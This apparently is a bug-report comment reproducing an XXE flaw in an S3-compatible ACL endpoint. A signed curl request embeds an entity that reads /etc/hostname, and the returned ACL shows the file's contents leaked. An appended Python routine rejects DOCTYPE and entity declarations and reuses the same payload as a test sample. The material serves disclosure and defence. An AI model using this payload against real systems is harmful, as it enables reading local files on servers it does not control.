NOTE: in the original bug description there is a trailing ';' at the end of the <AccessControlPolicy> element that I didn't spot for a while, and it caused malformed XML errors.
Confirmed on my vsaio:
```
vagrant@vagrant:~$ curl 'http://saio3:8080/my-bucket?acl=' -X PUT \
  -H "Host: saio3:8080" \
  -H "Content-Type: application/x-www-form-urlencoded; charset=utf-8" \
  -H "X-Amz-Content-Sha256: cfef77034aa96b13190894b26347367d4e95bc3aa2212f467eaae66c75250510" \
  -H "X-Amz-Date: 20221220T193239Z" \
  -H "Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20221220/us-east-1/s3/aws4_request, SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date, Signature=660efe254e6d3210293e778718b5391ca831e2c814c8ec1ebb9300d004430d78" \
  --data-binary '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname"> ]>
<AccessControlPolicy xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Owner>
<DisplayName>test:tester</DisplayName>
<ID>test:tester</ID>
</Owner>
<AccessControlList>
<Grant>
<Grantee xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="CanonicalUser">
<DisplayName>&xxe;</DisplayName>
<ID>&xxe;</ID>
</Grantee>
<Permission>WRITE</Permission>
</Grant>
</AccessControlList>
</AccessControlPolicy>'
vagrant@vagrant:~$ aws s3api get-bucket-acl --bucket my-bucket
{
    "Owner": {
        "DisplayName": "test:tester",
        "ID": "test:tester"
    },
    "Grants": [
        {
            "Grantee": {
                "DisplayName": "vagrant\n",
                "ID": "vagrant\n",
                "Type": "CanonicalUser"
            },
            "Permission": "WRITE"
        }
    ]
}
```
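A defensive check for the behaviour confirmed above, as an added example that is not part of the bug report and not Swift's own code: an ACL body is refused as soon as it carries a DOCTYPE or entity declaration, so a reference like `&xxe;` can never be expanded into file contents. It uses only the Python standard library; `parse_acl_grants`, `ForbiddenXML` and both sample bodies are hypothetical names and constructed inputs modelled on the request in the comment.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat

S3_NS = "{http://s3.amazonaws.com/doc/2006-03-01/}"
_XSI = 'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"'

class ForbiddenXML(ValueError):
    """The ACL document carries a DTD or an entity declaration."""

def _reject(kind):
    def handler(*_args):
        raise ForbiddenXML(kind + " not allowed in an ACL document")
    return handler

def parse_acl_grants(body: bytes):
    """Return [(grantee_id, permission), ...] or raise ForbiddenXML."""
    # Pass 1: walk the body with expat only to refuse any DTD material.
    # Exceptions raised inside a handler propagate out of Parse().
    guard = expat.ParserCreate()
    guard.StartDoctypeDeclHandler = _reject("DOCTYPE")
    guard.EntityDeclHandler = _reject("ENTITY declaration")
    guard.Parse(body, True)
    # Pass 2: no DTD is present, so no entity can name a local file.
    root = ET.fromstring(body)
    grants = []
    for grant in root.iter(S3_NS + "Grant"):
        grantee_id = grant.findtext(S3_NS + "Grantee/" + S3_NS + "ID")
        grants.append((grantee_id, grant.findtext(S3_NS + "Permission")))
    return grants

# Constructed sample bodies (assumptions, shaped like the PUT ?acl request).
_ACL = ('<AccessControlPolicy xmlns="http://s3.amazonaws.com/doc/2006-03-01/">'
        '<Owner><ID>test:tester</ID></Owner><AccessControlList><Grant>'
        '<Grantee ' + _XSI + ' xsi:type="CanonicalUser"><ID>%s</ID></Grantee>'
        '<Permission>WRITE</Permission></Grant></AccessControlList>'
        '</AccessControlPolicy>')
BENIGN_ACL = (_ACL % "test:tester2").encode()
XXE_ACL = ('<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname"> ]>'
           + _ACL % "&xxe;").encode()

if __name__ == "__main__":
    print(parse_acl_grants(BENIGN_ACL))
    try:
        parse_acl_grants(XXE_ACL)
    except ForbiddenXML as exc:
        print("rejected:", exc)
```
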